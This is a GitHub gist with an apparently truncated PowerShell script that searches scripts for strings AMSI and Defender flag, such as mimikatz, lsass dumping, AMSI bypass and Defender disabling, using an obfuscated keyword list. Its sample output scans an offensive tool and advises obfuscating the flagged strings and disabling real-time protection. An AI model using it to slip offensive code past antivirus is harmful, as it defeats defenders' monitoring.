Last active
August 26, 2024 07:04
-
-
Save r00t-3xp10it/510a59a4053d15e62b0023dc4a192842 to your computer and use it in GitHub Desktop.
identify possible ams1 detection strings in files
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
.SYNOPSIS | |
Identify possible ams1 strings inside scripts | |
Author: @r00t-3xp10it | |
Tested Under: Windows 10 (19044) x64 bits | |
Required Dependencies: none | |
Optional Dependencies: none | |
PS cmdlet Dev version: v2.2.18 | |
.DESCRIPTION | |
This cmdlet was written to detect suspicious ams1 strings in .ps1 or .psm1 | |
scripts, helping developers identify which line of the script the malicious | |
string is in and to take the necessary steps to prevent further detections. | |
.NOTES | |
When scanning its advice to disable windows defender RealTime Protection. | |
All the strings contained in this script were found in diferent web forums | |
since microssoft oficial ams1 documentation until free open sources. This | |
script it will not make any heuristic\memory scans just a string search. | |
This project detects suspicious strings, large $variable names and count | |
the amount of special characters present inside script compared with the | |
number of script max lines then cmdlet does the math [is_suspicious_?] | |
.Parameter FileToScan | |
Script to scan full path | |
.Parameter LogFile | |
Switch that creates report logfile | |
.Parameter RateHigh | |
Switch to only display 'rate High' results | |
.EXAMPLE | |
PS C:\> .\identify_offencive_tools.ps1 -filetoscan "$pwd\evil.ps1" | |
.EXAMPLE | |
PS C:\> .\identify_offencive_tools.ps1 -filetoscan "$pwd\evil.ps1" -logfile | |
.EXAMPLE | |
PS C:\> .\identify_offencive_tools.ps1 -filetoscan "$pwd\evil.ps1" -ratehigh | |
.INPUTS | |
None. You cannot pipe objects into identify_offencive_tools.ps1 | |
.OUTPUTS | |
👁🗨 Detecting [ams1] malicious strings 👁🗨 | |
File information | |
Total lines : 4183 | |
File size : 277107 | |
Current Time : 26/12/2023 04:15:54 | |
Last access : 26/12/2023 04:15:51 | |
File hash : 0E2044C484CD29FE8E16E15E4CD2D3765703BF7E042239D01E0C5C1B29DC6079 | |
File to scan : C:\Users\pedro\Coding\meterpeter\meterpeter.ps1 | |
🍳 Scanning file .. | |
Token : 1 | |
DetectionRate : Critical | |
MaliciousString : IE`X | |
LineNumber : 4407 | |
Token : 2 | |
DetectionRate : Critical | |
MaliciousString : powershell -vers`ion 2 | |
LineNumber : 3622 3632 3637 3654 3658 3664 | |
Token : 3 | |
DetectionRate : Critical | |
MaliciousString : ru`nas | |
LineNumber : 385 465 542 546 672 676 3343 3363 3458 3916 | |
Token : 4 | |
DetectionRate : Medium | |
MaliciousString : while($true) | |
LineNumber : 794 978 3103 | |
🍳 File scanning report | |
===================================================================================== | |
Tokens found : 4 | |
Urgent attention : 3 | |
File total lines : 4183 | |
Special characters : 9356 [`+&'] MaxAllowed:[7395] | |
Scan elapsed time : 00:02:06 ⏱️ 29 Friday 2023 | |
File scanned : C:\Users\pedro\Coding\meterpeter\meterpeter.ps1 | |
⚙️ recomendation | |
Its advice to obfuscate all high rate results found [3] | |
because System.Management.Automation.Amsi contains entry | |
http://bit.ly/System_Management_Automation_Engine_Runtime | |
⚙️ recomendation | |
Its advice to reduce the number of special characters | |
inside file like [`+&'] that reveal to forensics that | |
we are dealing with an heavily obfuscated file\script | |
URL:http://bit.ly/malicious-powershell-usage-detection | |
===================================================================================== | |
.LINK | |
https://github.com/r00t-3xp10it/redpill | |
http://bit.ly/malicious-powershell-usage-detection | |
http://bit.ly/System_Management_Automation_Engine_Runtime | |
https://docs.velociraptor.app/exchange/artifacts/pages/powershellmonitoring | |
https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal | |
#> | |
[CmdletBinding(PositionalBinding=$false)] param( | |
[string]$FileToScan="$pwd\identify_offensive_tools.ps1", | |
[switch]$RateHigh, | |
[switch]$LogFile | |
) | |
$TotalTokens = "321" | |
## Global variable declarations | |
$ErrorActionPreference = "SilentlyContinue" | |
$host.UI.RawUI.WindowTitle = "Identify_Offensive_Tools (IOT)" | |
write-host "👁🗨 Detecting [ams1] malicious strings 👁🗨`n" -ForegroundColor Green | |
$ScriptSize = (Get-Content -Path "$FileToScan"|Measure-Object -Line).Lines | |
$MaliciousKeywordsList = @( | |
"I@E'X", | |
"-e@n'c", | |
"-n'o@p", | |
"am@si", | |
"vi'r@us", | |
"key@log", | |
"tr@ojan", | |
"t@r'y'{", | |
"cm'd /@c", | |
"mal@ware", | |
"payl@oad", | |
"-b@x'o@r", | |
"revsh@ell", | |
"mimi@katz", | |
"t'r@y '{'", | |
"am@si.dl'l", | |
"hashd@ump", | |
"Ad@d-Ty'pe", | |
"phi@sh@ing", | |
"-@enc@od'ed", | |
"DllI@mport", | |
"obfu@sca@te", | |
"imp@ers@onate", | |
"rever@sesh@ell", | |
"Exc@lus'ion@Path", | |
"reve@rse sh@ell", | |
"re@verse-she@ll", | |
"s@y'st@'emi@n'f@o", | |
"Ams@iSca'n@Bu'ff@er", | |
"in@vok'e-mim@ik'atz", | |
"-e@nco@de'dcom@ma'nd", | |
"Excl'us@ionP@roc'ess", | |
"In@vo'ke-Exp@ress'ion", | |
"la@z'ag@ne.e'x'@e a'l@l", | |
":@:A'd@m'ini@s'tr@a'to@r", | |
"re@d team@ing", | |
"ams@iu'ti@ls", | |
"ams'iIn@itFa'il@ed", | |
"keys@troke", | |
"buff@er ove@rflow", | |
"bru@tefo@rce", | |
"redte@am", | |
"red te@am", | |
"she@llcode", | |
"file@less", | |
"prive@sc", | |
"esca@late pri@vileges", | |
"passwo@rd guess@ing", | |
"gue@ss log@in", | |
"crede@ntial du@mp", | |
"passw@ord spr@aying", | |
"passwo@rd spr@ay", | |
"clea@rte@xt pas@swo'rds", | |
"rem@ote execut@ion", | |
"cre@ds du@mp", | |
"cre@denti@als du@mp", | |
"pass th@e ha@sh", | |
"pa@ss-the-h@ash", | |
"gol@den tic@ket", | |
"dump@ing the lsa@ss", | |
"dumpi@ng lsa@ss", | |
"du@mp ls'as@s", | |
"cache@d crede@n'tials", | |
"l@s'a secr@ets", | |
"cry@pt'o:@:sc'a@u't@h", | |
"impe'rso@nat@ing user", | |
"imper@so'nate us@er", | |
"im@pa'ck@et", | |
"ls@as's du@mp", | |
"pro@cdu@m'p", | |
"obfu@scated", | |
"obfu@scat@ion", | |
"pw@du@m'p", | |
"comm@and a@nd con@t'rol", | |
"drop@per", | |
"web sh@ell", | |
"we@bsh@ell", | |
"kerb@er'os re@la'y", | |
"spo@ofing", | |
"ele@va@te pr'ivi@lege", | |
"ab@use ele'va@tion", | |
"b@ypas@s u@a'c", | |
"ua@c b'ypa@ss", | |
"acce@ss tok@en man'ip@ula@ti'on", | |
"to@ken imp'ers@onation", | |
"tok@en the@ft", | |
"ev@ade pro@c@ess-mon@i'to@ring", | |
"bypa@ss pa@ss'wo@rd", | |
"vi@ctim ip", | |
"snif@fing", | |
"poi@soning", | |
"elev@ate pr'oc@ess pr@ivi'leg@es", | |
"ele'v@ate its pr@ivi'leg@es", | |
"by@pa'ss us@er acc@ou'nt con'tr@ol", | |
"po'we@rsh'ell -e@p 'by@pa@ss", | |
"po'we@rsh'ell -@exe@cut'io@np@ol'ic@y by@pas@s", | |
"R'u@be'u@s.e'x@e du@m'p", | |
"expl@oit", | |
"key@log@ger", | |
"sn@if@fer", | |
"pas@sw'ord cr@ack", | |
"pass@wo'rd hac@king", | |
"pa@ss'wo@rd bre@ac'h", | |
"pa's@swor@d at@ta'ck", | |
"pass@wo'rd st@e'al@er", | |
"by@pa'ss ant@ivi'rus", | |
"b'ru@te fo@r'ce", | |
"re@mo'te acc@e'ss", | |
"pa'ss@wo'rd ha@sh'ing", | |
"co@d'e inje@ction", | |
"key@st'ro@ke log@gi'ng", | |
"keyl@ogg'ing", | |
"pas@swor'd sni@ff'ing", | |
"ciph@er", | |
"coo@kie steal@ing", | |
"pas'sw@ord crac@king", | |
"enc@rypt'ion", | |
"pr@iv'ile@ge @es'cala@ti'on", | |
"k'ey log@gi'ng", | |
"pa'ss@word ha@rves@ting", | |
"ea've@sdr@oppi@ng", | |
"bru@te-fo'rc@ing", | |
"coo@ki'e the@ft", | |
"ref'lec@tion atta@ck", | |
"cr@yp'to atta@ck", | |
"smu@rfing", | |
"pin@g o'f de@a'th", | |
"crede@n'tial @th'eft", | |
"ke'yl@ogg'e@r in@stall@at'ion", | |
"has@hing", | |
"file@le@ss at@ta@ck", | |
"imp@er'sonati@on", | |
"file@le'ss ma@lwa're", | |
"payl'oa@d deliv@ery", | |
"an@tivi'rus @ev'as@ion", | |
"dat@a obfus@cation", | |
"l@da'p in@je'ction", | |
"dec@ry'ption", | |
"Defi@neD@yn'ami@cAssembly", | |
"Defi@ne@Dy'nam@icMo'dule", | |
"Def@i'ne@Ty'pe", | |
"Def@in'eC@onst'r@uc@tor", | |
"Cre@at'eTy@pe", | |
"Defi'ne@Lite@ral", | |
"Def@in'eE@num", | |
"Defin@eF'ie@ld", | |
"ILG@en'er@ator", | |
"Em'i@t", | |
"Unv@e'rifi@abl'eC@ode@Att'rib@ute", | |
"Defi@nePI'nvok@eMe'th@od", | |
"G@e'tS@tr'e@am"; | |
"@Get@Ty'pes", | |
"Get@Ass@em'blies", | |
"Met@ho'ds", | |
"Ge@tCon'stru@ct'or", | |
"GetC@ons'tru@cto'rs", | |
"Ge'tDef@ault'Me@mb'ers", | |
"Ge@tEve@nt", | |
"GetE@ve'nts", | |
"Get@Fie'ld", | |
"Ge@tFie'lds", | |
"@Ge@tInt@er'face", | |
"GetInt@erf'aceMap", | |
"Ge@tIn'terf@aces", | |
"GetM@em'be@r", | |
"G'etM@emb@ers", | |
"Get@Met'ho@d", | |
"Get@Met'ho@ds", | |
"Ge@tN'es@te'dType", | |
"Get@Ne'st@ed@Ty'pes", | |
"Ge@tPr'ope@rt'ies", | |
"Ge@tPro'pe@rt'y", | |
"@In'vok@eMe'mb@er", | |
"Ma@k'eAr@ra'yTy@pe", | |
"Mak@eB'yR@efT@yp'e", | |
"Ma@ke'Ge@ne'ric@Type", | |
"Mak'eP@oin'te@rTyp'e", | |
"De'cl@ari'ngM@et'hod", | |
"Decl'ar@ing@Ty'pe", | |
"Ref@lec'ted@Ty'pe", | |
"Typ@eHa@nd'le", | |
"T@ype'In@iti'al@izer", | |
"Un'de@rlyi'ng@Syst'em@Type", | |
"In@te'rop@Se@rv'ic@es", | |
"All@oc'HG@lo'ba@l", | |
"Pt'rT@oSt'ru@ct@u're", | |
"St@ru'ct@ur'eToP@t'r", | |
"Fr@eeHG'lo@bal", | |
"In'tPt@r", | |
"Mem@ory'Str'e@am", | |
"Def@lat'eSt@r'ea@m", | |
"From@Ba'se6@4S'trin@g", | |
"Enc'od@e'dCo@mm'and", | |
"Byp'a@ss", | |
"ToB@a'se6'4S@tri'n@g", | |
"Exp@an'dS@tr@ing", | |
"GetP'ow@erS'he@ll", | |
"Op@enPr'oc@ess", | |
"Vi@rtu'alAl@loc", | |
"V'ir@tu@alF'r@ee", | |
"Writ@ePro'cessMe@mory", | |
"Crea@teU'serTh@r'ead", | |
"Cl@ose'Ha@n'dle", | |
"GetDe@le'g@ateF'orFun'cti@onP'oi@n@ter", | |
"ke@rn'el3@2", | |
"Cr@eat'eThr@e'ad", | |
"me'mc@py", | |
"Loa'dL@ib'ra@ry", | |
"GetM@od'ul@eHa'nd@le", | |
"Ge@tPr'ocA@dd@r'ess", | |
"Vir'tu@al@Prot'ec't", | |
"Fre@eLib'ra@ry", | |
"Re'a@dPr'oc@ess@Mem'ory", | |
"Cre'a@teRe'm@ot@eThr'ea@d", | |
"Ad@justT'ok@enP@ri@vil'eges", | |
"Wri@te@B'yt'e", | |
"Wri@teI@nt'32", | |
"O'penTh're@adT'ok@en", | |
"Pt@rT'oS@tri@ng", | |
"Ze@roFr'eeGlob@alA'llo@cU'ni@code", | |
"Op@en@Pr'oce'ssT'ok@en", | |
"Get@Tok'e@nInf'or@matio'n", | |
"Se@tTh're@a'dTo@k'en", | |
"Im'per@son'a@teLogg'edO'nUs@er", | |
"Rev'er@tT'oSe@lf", | |
"Ge@tLo'go'nS@ess@i'o@nData", | |
"Crea't@e'Proc@es'sW@ithTo'ke@n", | |
"Du'pli@cat'eTok@en'Ex", | |
"Op@en@Wi'nd@owSt'ati'o@n", | |
"Ope@nDe@s'ktop", | |
"@Min'i'Du@mpWr@it'eD'ump", | |
"A@dd'Sec@uri'tyPa@ck'age", | |
"Enu@me'r@at@eSecu'ri@tyPa'ck@ages", | |
"Ge@tPr@oce'ss@Ha'ndle", | |
"Dange'ro@usG@etH'an@dle", | |
"Get@As'yn@cK'ey@State", | |
"'Key@bo'ar@dS'ta@te", | |
"G@etFo're@grou@nd'Wi@ndow", | |
"Bin'di@ngFl'ag@s", | |
"No'n@Pu'bl@ic", | |
"Scr'ip@tBl'oc@kLog'gi@ng", | |
"Lo'gPi2peli'neEx@e@cuti'onDe@tails", | |
"P'rot@ect'edEv@en'tLo@gg'ing", | |
"while.*true", | |
"pow@ers'hell -@ve'rsi@on '2", | |
"Se'tVa@lue.*nu@ll,", | |
".Wr'it@e.*st,0,`$st.Len@gt'h", | |
"sc@ht'ask@s '/cr@eat'e", | |
"Se@t-M'pPr@e'fer@en'ce", | |
"Alw@ay'sIns@t@al'lEle@vat'ed", | |
"ru'n@as", | |
"Ad'd-Exf@il'trati@on", | |
"Ad@d-Pe'rs@ist'en@ce", | |
"@Ad'd-@RegB'ack@do'or", | |
"Ad'd-Sc@r'nSav@eBa'ck@doo'r", | |
"E@nab'le@d-'Dup@li'cat@eTo'k@en", | |
"Ge@t'-Key@strok'e@s", | |
"LS'ASe@cr'e@t", | |
"Ge't-Pa's@sHa's@h", | |
"'G@et-Re@gAl'way@sI'nst@all'Ele'va@t@ed", | |
"Ge@t-S'cre@en'shot", | |
"G'e@t-Ser@vi'ceUn'qu@oted", | |
"Ge't-@Syst'em", | |
"Get'-V@@ed'en@tial", | |
"In@vo'ke-B@yp'assU'AC" | |
"Inv@ok@e-Dl@lI'nj@ecti'o@n", | |
"In'vo@ke-M@imi@ki'tt@e'nz", | |
"Inv'ok@e-PS'I'nj@ec't", | |
"I@nv'ok@e-P'sEx@ec", | |
"I@nv@ok@e-'Ru@nA's" | |
"In@vo'ke-W@Scr'iptB@yp@as'sU@A'C", | |
"O'u@t-@Mini'd@um'p", | |
"Am@siB'yp@as's", | |
"ni@sh'a@ng", | |
"Inv'ok@e-S@he'll@Co'mm@and", | |
"@-dum'pc@r", | |
"SeI@mp'erso@na'te", | |
"SeDe'bu@gPri'vi@leg'e", | |
"cra@ck'map@ex'e@c", | |
"ls@ad'ump:':s@a'm", | |
"SEK'UR@LS'A:@:Pt'h", | |
"ke'r@ber'os:':p@tt", | |
"k'erb@ero's::go@ld'en", | |
"s@eku'rl@sa:':mi@nid'u@mp", | |
"sek'u@rls'a:@:log@o'nPas@s'wor@ds", | |
"to'ke@n:':el'ev@at'e", | |
"in@vok'e-@com'ma@nd", | |
"ru'ndl@l3'2@", | |
"ce'r@tu'ti@l", | |
"m@sh't@a", | |
"we'v@tut@il.e'x'e' c@l'", | |
"S@hel'lE'xec@ut@e", | |
"sc s@to'p @Win@Defe'nd", | |
"@Rem'ove-@MpT'h're@at", | |
"s@'c s@top 'Se@n'se", | |
"a@@ms'i_d'is@ab@l'e", | |
"@lsa's'@@'s.e'x'e", | |
"we@vtu't@il @c'l'", | |
"a'msi@co@@n'text", | |
"@/sav'ecr@e'd", | |
"n'c.e'x'e", | |
"-@Scr'i@ptBl@oc'k", | |
"@Du'm@pS'A@M", | |
"@Du'm@p-S'A@M", | |
"@S-'1'-5-3@'2-5@4@'4", | |
"imp@e'rso@na'te@us@e'r:", | |
".do@w'nl@oa'ds@tr'i@ng'", | |
"Ex@cl'usi@onEx'ten@si@@on", | |
"sek@ur'l@s'a:@:tic@ke't@s", | |
"sy'st@em.@net'.w@ebc@li'e@nt", | |
"Mi@niDu@mp'Wi@thHa@ndl'eD@ata", | |
"Re@alTi@me'Pr@ot@ec'ti@on'En@ab'le@d", | |
"Min@iD'u@mpWi@thP@ro'ces@sTh're@adDa@ta", | |
"'Sys@t'em.@Man'age@me'nt.'Au@tom'at@io'n.", | |
"@-Di@sa@bleI@OA'V'Pr@ote@c'ti@on @`$tr@ue", | |
"-D@isa@bleRe@al'ti@m'ePro'te@cti@o'n `$tru@e", | |
"-D@isa@bleRe@al'ti@meM'o'@nito@ri@n'g `$tr'ue", | |
"I@nv'o@ke-@We'bR@equ'e@s@t .*`"{0}`?url={1}", | |
"S@ys'tem.Run@tim'e.@Int'er@opSer'vi@ces@.'Ma@rs@ha'l", | |
"H@KL'M:\SO'FTW@A'RE\Mi@cr'os@oft\A'MS@I@\Pro'vi@de'rs", | |
"M@pCm'dR'u@@n.e'x'e -@Rem'oveD@ef'in@iti'o@ns -'Al@l", | |
"'-Dis@abl@eIntr@us'ionP@re've@nt'ionS'y'@ste'm `$tr@ue" | |
) | |
## Rating strings | |
$HigthRate = "Mi@niDu@mp'Wi@thHa@ndl'eD@ata|Min@iD'u@mpWi@thP@ro'ces@sTh're@adDa@ta|sek@ur'l@s'a:@:tic@ke't@s|R'u@be'u@s.e'x@e du@m'p|cry@pt'o:@:sc'a@u't@h|.do@w'nl@oa'ds@tr'i@ng'|Ke@ybo@a'r'dSt@a'te|Dl@lIm'po@rt|la@z'ag@ne.e'x'@e a'l@l|'-Dis@abl@eIntr@us'ionP@re've@nt'ionS'y'@ste'm `$tr@ue|M@pCm'dR'u@@n.e'x'e -@Rem'oveD@ef'in@iti'o@ns -'Al@l|G@e'tS@tr'e@am|we'v@tut@il.e'x'e' c@l'|we@vtu't@il @c'l'|-D@isa@bleRe@al'ti@meM'o'@nito@ri@n'g `$tr'ue|-D@isa@bleRe@al'ti@m'ePro'te@cti@o'n `$tru@e|@-Di@sa@bleI@OA'V'Pr@ote@c'ti@on @`$tr@ue|a'msi@co@@n'text|a@@ms'i_d'is@ab@l'e|po'we@rsh'ell -@exe@cut'io@np@ol'ic@y by@pas@s|S@hel'lE'xec@ut@e|'I@E'X@|-'e@n'c|-n'o@p|a'ms@i|c'md @/c'|mim@ik'at@z|A'dd@-T'y@p'e|-@en'c@od'ed|A@ms'iSc'an@Bu@f'fe@r|i'nv@o'ke-@mim'ik@a'tz|-'en@cod'edco@mm'and|In@vok'e-'Ex@pres'si@on|am'si@ut'il@s|ams'iI@ni'tFa@il@e'd|ls'a @se'cr@et@s|im'pac'@et|pr@ocd'u@mp|pw'd@um'p|by'pa@s@@s ua'@c|u'a@c by@p'a@ss|po@we'rsh@ell '-e@p by'pa@s's|Defi@neDy'namicAs@se'mbly|De'fi@neDyn'amic@Mo'du@le|De'fi@neT'yp@e|D@efi'neC@on'str@uc'tor|Cr@ea'teT@yp'e|De@fi@neLi'te@ra@l|D'ef@in'eEn@um|D@ef'in@eFi'el@d|I'LGe@ne'ra@tor|E@mi't|De'fi@nePIn@vok'eMet@ho'd|G@etT'yp@e's|Ge'tAs@se'mbli@es|Ge'tCo@nst'ru@c@tor|G@etC'onst'ru@ct'ors|Ge@tE'ven@t|G'e@tEv@e'nts|@Ge'tFi@el'd|G'etF@ie'l@ds|GetI'nte@rfa'ceM@ap|G'etIn@ter@f'ace|GetM@et'h@od|'Ge@tMe@tho@ds|G@etN'est@e'dTy@pe|GetN'est@edT'y@pe's|Ma@keA'rr@ayTy'p@e|Ma'keB@yRe'fTy@p'e|@Mak'eG@en'er@ic@T'y@pe|M@ak'ePoin'te@rT@y@pe|Dec@lar'ingMe@t'ho@d|Decl@@ari'ngTy'p@e|T@yp'eHa'nd@le|Typ'eIn@it'ia@li@z'er|Int'er@opSer'vi@c'es|Al'locH@Glo@b'a@l|'Pt@rT'oStr'uc@t'ur@e|St@ruc'tur@eT'oP@t'r|Fre@eH'Gl'ob@al|'I@ntP't@r|Memo'rySt@re'am|De@fla'teSt'r@eam|@Fro'mBa@s'e6@4S't@ri'ng|En'cod@edC'om'm@a@nd|'T@oBa'se6'4@@Str'in@g|Ope'nPro'c@ess|'V@ir't@ualA@ll'oc|Vir't@ualF'r@ee|Wr'it@ePro@ce'ssM'em@o'ry|Cre@at'eUs'erT@hr@e'ad|Clo@seHa'nd@le|ke'rn@el@3'2|GetD@ele'gateF'or@Fu'nct@io'nPo'int@e'r|@C're'a@teTh@r'ead|me'mc@p'y|Ge@tPr'oc@A'dd@@r@es's|Vir@tu@alPr'ot@e'ct|Rea'dPr@oc@essM'em@or'y|Cr@ea'teRe'moteTh@re'ad|@Wr'iteBy@t'e|Adj@us'tTok'en@Pr@ivi'leg@e's|Wr'it@eIn@t3'2@|Ope'nTh@re'adT@ok'en|P@trT'oStr'in@g|Ze@roFr'eeGl@obalA@ll'ocUn@ic'od@e|Op'enPr@oc'essT@o'ke@n|Ge@tTok'enIn@fo'rm@at'i@on|S@etT'hr@ea'dTok'e@n|Im@pe'rs@ona'teLo@gg'edOn@U's@er|@Re've@rtT'oS@e'l@f|Cr@ea'tePro@ce@s'sWi'thT@ok'en@|D'up@lic'ateT'ok@enE'x'|Ope'nWi@ndo'wSta@ti@o'n|Mi'niD@um'pWr@i'teD'um@p@|@G'etPr@oce'ssH@an'dl@e|Ge'tAs'yncK@eyS'ta@t'e|Ge@tKe'ybo@ar@dS@ta'te|@No@nPu'b@li@'c@|Pro'tec@te'dE've@ntL@og@g'in@g|pow'ers@hell @-'ve@rs'ion @@2'|@r@u'n'a@s|Se'tVa@lue.*nu@ll,|@sch@ta'sks@ '/@cr@e'at@e|Se@t-@M'pPref'er@e'nc@e|A'lw@ay'sInst@allE'lev'at@ed|Ad@d'-Ex@fil'tra@ti@on|@Ad@d-Pe'rs@is@t'en@ce'|Ad'd-@R'egBa@@ckd'o@o@r|A'dd@-'Sc@rnS'av@eBa'c@kd@oo'r|En'a@bl'ed-Du'plic@a'teTo@ke'n|Ge't-@Ke'yst@ro'k@e's|@LS'ASe@c're@t@|G'et-Pa'ssH@as'h@|Ge't-R@egA'lwa'ysIn@st@allE'lev@a't@e'd|@Get@-Se'rvi@ceU'nq@u'ote@d'|@Ge't-Sy@@s'te@'m|Ge@t-'Vau'ltCr@ede'nt@i'al|I'@nv'ok@e-@By'pa@@s's'U'@A'C@|Inv@o'ke-Dl@lI'nj@ec't@i@@o'n|@In@v'o'ke@-M'im@ik'it@t'e@@n'z|I'nv@oke-@P'SIn@je'c@t'|@'I@n'vo'k@e-Ps@E'x@e@@c|@In@v'ok@'@e-@R'u@nA'@s'@|@In@v'ok@'@e-W'Scr@ip'tBy@@pa's'sU@A'@C'|O'ut-Min'@id'um@p'|@Am'siB@ypa's@s|nish@a'ng|@-du'mp@cr|S@eImp'er@son'a@te@|S@eDe'bugP'r'i@vi@'@leg@e'|cr'a@ckm'ape@x'ec@|l@sad'u@mp:@:s'am'|S'EK@URL'SA:@:Pt'h@|ke@rbe'ro@s:':@pt't@|@kerb'e@ro's:@:go'l@d@@e'n|@sek'url@'@s'a:':min'id@u'm@@p'|se'kur@ls'a:@:@lo'gonPa@'ss@w@o'rds'|@tok@en:':el'ev@a't@e@|in'v@o'ke-@com'm@a'nd@|c'ert@ut@il|m'sh@t'a|sy'st@em'.@net.we'bcl@i'en@t''@|@Sy@st'em.@Man'ag@@e'men@t'.Au@t'oma@t'io@n.'@'|Sy'st@em'.@Ru'n@'@ti@m'e.'Inte@r'opServ@i'ces@.Ma'rsh@a'l'|HK@L'M@:\SO'FT@@WA'R'E\Micr@oso'ft@\A'M@@S'I@\Pro'vi@de'rs@'" | |
$MediumRate = "-b@x'o@r|I@nv'o@ke-@We'bR@equ'e@s@t .*`"{0}`?url={1}|while.*true|imp@e'rso@na'te@us@e'r:|Re@alTi@me'Pr@ot@ec'ti@on'En@able@d|.W@ri'te.*st,0,`$st.Le'ng@t'h|:@:A'd@m'ini@s'tr@a'to@r|Re@m'o@ve-@MpTh@r'e@at|-@Scr'i@ptBl@oc'k|Ex@cl'usi@onEx'ten@si@@on|Ex@clu'sio@nP'at@h|Exc@lu'sionPr@oc@e'ss|@Du'm@pS'A@M|@Du'm@p-S'A@M|@S-'1'-5-3@'2-5@4@'4|t@r'y'{|t'r@y '{'|s@y'st@'emi@n'f@o" -replace '(@|'')','' | |
## Internal | |
$ScanStartTimer = (Get-Date) | |
$HigthRate = $HigthRate -replace '(@|'')','' -replace '\\','\\' | |
$ScriptDescription = (Gci -Path "$FileToScan" -EA SilentlyContinue) | |
$MaliciousKeywordsList = $MaliciousKeywordsList -replace '(@|'')','' -replace '\\','\\' | |
If((Get-MpComputerStatus).RealTimeProtectionEnabled -match '^(True)$') | |
{ | |
write-host "`n📛 Its advice to disable windows defender RealTime Protection.`n`n" -ForegroundColor Red | |
Start-Sleep -Seconds 2 | |
} | |
If(-not(Test-Path -Path "$FileToScan" -EA SilentlyContinue)) | |
{ | |
write-host "📛 Not found: '$FileToScan'`n" -ForegroundColor Red | |
return | |
} | |
If(-not($FileToScan -imatch '(.ps1|.psm1)$')) | |
{ | |
write-host "📛 This cmdlet only accepts [.ps1|.psm1] scripts" -ForegroundColor Red | |
write-host " filetoscan '" -NoNewline | |
write-host "$FileToScan" -ForegroundColor Green -NoNewline | |
write-host "'`n" | |
return | |
} | |
function Invoke-CountObfuscationChars () | |
{ | |
<# | |
.SYNOPSIS | |
Author: @r00t-3xp10it | |
Helper - 🔥 Count the number of special chars in script 🔥 | |
.NOTES | |
This function flags has suspicious more than 8 [`+&'] special chars | |
for line. To find that value function multiples the number of lines | |
for 8 ( max special chars allowed for line == MaxCharsAcceptable ) | |
#> | |
$MatchedString = 0 | |
$RawCmdletData = (Get-content -Path "$FileToScan" -Raw) | |
## Regular expression pattern to match obfuscated chars | |
$RegexPattern = "[``+&\']" | |
## Count the number of obfuscated characters in the script | |
$Matches = [regex]::Matches($RawCmdletData, $RegexPattern) | |
$MatchedString = $Matches.Count | |
## Define how many chars is acceptable | |
# Only 8 special chars for line allowed! | |
# so we multiply the number of lines by 8 (max special chars allowed) | |
$ScriptSize = (Get-Content -Path "$FileToScan"|Measure-Object -Line).Lines | |
$MaxCharsAcceptable = ($ScriptSize * 8) -replace '(,\d*)$','' | |
If($MatchedString -gt $MaxCharsAcceptable) | |
{ | |
echo "Rec" > "$Env:TMP\Recomendation.log" | |
write-host "Special characters : " -NoNewline | |
write-host "$MatchedString" -ForegroundColor Red -NoNewline | |
write-host " [" -NoNewline | |
write-host "``+&'" -ForegroundColor DarkYellow -NoNewline | |
write-host "] MaxAllowed:[" -NoNewline | |
write-host "$MaxCharsAcceptable" -ForegroundColor DarkYellow -NoNewline | |
write-host "]" | |
If($LogFile.IsPresent) | |
{ | |
echo "[KO] Large number of [``+&'] chars detected: $MatchedString" >> "$pwd\identify_offencive_tools.log" | |
} | |
} | |
} | |
function Invoke-MaliciousVarsScan () | |
{ | |
<# | |
.SYNOPSIS | |
Author: @r00t-3xp10it | |
Helper - 🔥 Detect large $variables names inside script 🔥 | |
.NOTES | |
Normally attackers use large $variable names has obfuscation, this | |
function flags has suspicious $variable names greater than 40 chars | |
#> | |
## Regex search - $VariableName( =|=) | |
$ScanMaliciousVars = (Get-Content -path "$FileToScan"|Select-String -Pattern '\$([a-zA-Z0-9_]*(\s=|=))') | |
ForEach($Item in $ScanMaliciousVars) | |
{ | |
## Delete all chars after the = (equal) sign | |
$RawSuspicious = $Item -Split('=')|Select-Object -First 1 | |
## Delete all chars before the $ (dollar) sign | |
$SuspiciousString = $RawSuspicious -replace '^(.*\$)','' | |
## Re-Construct string again for report output | |
$SanitizePath = "`$" + "$SuspiciousString" + "=" -join '' | |
If($SuspiciousString.Length -gt 40) | |
{ | |
echo "Rec" > "$Env:TMP\SuspiciousVars.log" | |
write-host "Suspicious `$var= : " -NoNewline | |
write-host "$SanitizePath" -ForegroundColor Red | |
If($LogFile.IsPresent) | |
{ | |
echo "[KO] Suspicious [$]var= $SanitizePath" >> "$pwd\identify_offencive_tools.log" | |
} | |
} | |
} | |
} | |
## Disclamer | |
$MsgBoxTitle = " Identify_Offencive_Tools (IOT)" | |
$MsgBoxText = "All the strings contained in this cmdlet list were found in diferent web sites since microssoft oficial documentation until free sources. This script it will not make any complicated scans, but it helps developers to review huge files for suspicious strings [ams1] and act accordingly.`n`nThis cmdlet uses color schemes to better identify string detection rates, it classify rate higth as red, rate medium as darkmagenta and rate low as yellow color." | |
powershell (New-Object -ComObject Wscript.Shell).Popup("$MsgBoxText",0,"$MsgBoxTitle",0+64)|Out-Null | |
## Header | |
$CurrentTime = (Get-Date).ToString() | |
$Tamanho = $ScriptDescription.Length | |
$SHA1 = (Get-FileHash "$FileToScan").Hash | |
$LastAccess = $ScriptDescription.LastAccessTime.ToString() | |
write-host "File information" -ForegroundColor DarkYellow | |
write-host "Total lines : $ScriptSize" | |
write-host "File size : $Tamanho" | |
write-host "Current Time : $CurrentTime" | |
write-host "Last access : $LastAccess" | |
write-host "File hash : $SHA1" | |
write-host "File to scan : " -NoNewline | |
write-host "$FileToScan" -ForegroundColor Green | |
If($LogFile.IsPresent) | |
{ | |
<# | |
.SYNOPSIS | |
Author: @r00t-3xp10it | |
Helper - Create logfile header function | |
#> | |
echo "Computer: $((Get-WmiObject Win32_OperatingSystem).CSName)" > "$pwd\identify_offencive_tools.log" | |
echo "$((Get-WmiObject Win32_OperatingSystem).Caption) - $((Get-WmiObject Win32_OperatingSystem).OSArchitecture)" >> "$pwd\identify_offencive_tools.log" | |
echo "Identify_Offencive_Tools - $CurrentTime" >> "$pwd\identify_offencive_tools.log" | |
echo "FileToScan: $FileToScan`n" >> "$pwd\identify_offencive_tools.log" | |
write-host "Logfile : " -NoNewline | |
write-host "$pwd\identify_offencive_tools.log" -ForegroundColor DarkYellow | |
} | |
write-host "`n`n🍳 Scanning file ... " | |
